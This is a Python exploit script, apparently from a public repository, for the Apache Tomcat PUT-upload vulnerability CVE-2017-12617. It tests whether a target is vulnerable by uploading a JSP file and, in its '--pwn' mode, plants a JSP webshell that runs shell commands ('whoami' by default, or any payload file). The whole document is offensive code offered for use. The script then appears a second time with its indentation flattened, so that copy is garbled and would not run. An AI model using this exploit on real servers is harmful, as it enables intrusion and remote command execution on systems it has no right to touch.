frankli0324/CVE-2017-12617.py

## CVE-2017-12617.py
import requests
import os
from argparse import ArgumentParser, FileType

banner = """
CVE-2017-12617
Frank
""".lstrip('\n')

pin = '<% out.println("content");%>'

payload = """
<%@ page import="java.io.*" %>
<%
String output = "";
String s = null;
try {
    Process p = Runtime.getRuntime().exec(new String[]{
        "bash", "-c", "whoami"
    });
    BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
    while((s = sI.readLine()) != null) { output += s+"\\n"; }
}  catch(IOException e) {   e.printStackTrace();   }
%>
<pre><%=output %></pre>"""


def upload_payload(url, payload):
    try:
        url = url.rstrip('/')+'/'
        return requests.put(
            url, data=payload.encode('utf-8')
        ).status_code == 201
    except:
        print('unable to reach target: ', url)
        return False


if __name__ == '__main__':
    parse = ArgumentParser()
    parse.add_argument("-u", "--url", dest="target", type=str,
                       help="set target url", required=True)
    parse.add_argument("-p", "--pwn", dest="pwn", action='store_true',
                       help="generate webshell and upload it")
    parse.add_argument("-f", "--file", dest="file", type=FileType('r'))

    opt = parse.parse_args()

    if opt.target != None:
        target = opt.target.lstrip('/')+'/upload.jsp/'

    print(banner)

    if opt.target == None and opt.pwn == None:
        print(parse.usage)
        exit(0)

    elif opt.target != None and opt.pwn == None:
        if upload_payload(target, pin) \
                and 'content' in requests.get(target).text:
            print('Target is Vulnerable to CVE-2017-12617')
        else:
            print('Not Vulnerable to CVE-2017-12617 ')
    elif opt.pwn != None and opt.target != None:
        if opt.file != None:
            try:
                payload = opt.file.read()
                print('Using', opt.file.name, 'as payload')
            except:
                pass
        print("Uploading File .....")
        upload_payload(target, payload)
	import requests
	import os
	from argparse import ArgumentParser, FileType

	banner = """
	CVE-2017-12617
	Frank
	""".lstrip('\n')

	pin = '<% out.println("content");%>'

	payload = """
	<%@ page import="java.io.*" %>
	<%
	String output = "";
	String s = null;
	try {
	Process p = Runtime.getRuntime().exec(new String[]{
	"bash", "-c", "whoami"
	});
	BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
	while((s = sI.readLine()) != null) { output += s+"\\n"; }
	} catch(IOException e) { e.printStackTrace(); }
	%>
	<pre><%=output %></pre>"""


	def upload_payload(url, payload):
	try:
	url = url.rstrip('/')+'/'
	return requests.put(
	url, data=payload.encode('utf-8')
	).status_code == 201
	except:
	print('unable to reach target: ', url)
	return False


	if __name__ == '__main__':
	parse = ArgumentParser()
	parse.add_argument("-u", "--url", dest="target", type=str,
	help="set target url", required=True)
	parse.add_argument("-p", "--pwn", dest="pwn", action='store_true',
	help="generate webshell and upload it")
	parse.add_argument("-f", "--file", dest="file", type=FileType('r'))

	opt = parse.parse_args()

	if opt.target != None:
	target = opt.target.lstrip('/')+'/upload.jsp/'

	print(banner)

	if opt.target == None and opt.pwn == None:
	print(parse.usage)
	exit(0)

	elif opt.target != None and opt.pwn == None:
	if upload_payload(target, pin) \
	and 'content' in requests.get(target).text:
	print('Target is Vulnerable to CVE-2017-12617')
	else:
	print('Not Vulnerable to CVE-2017-12617 ')
	elif opt.pwn != None and opt.target != None:
	if opt.file != None:
	try:
	payload = opt.file.read()
	print('Using', opt.file.name, 'as payload')
	except:
	pass
	print("Uploading File .....")
	upload_payload(target, payload)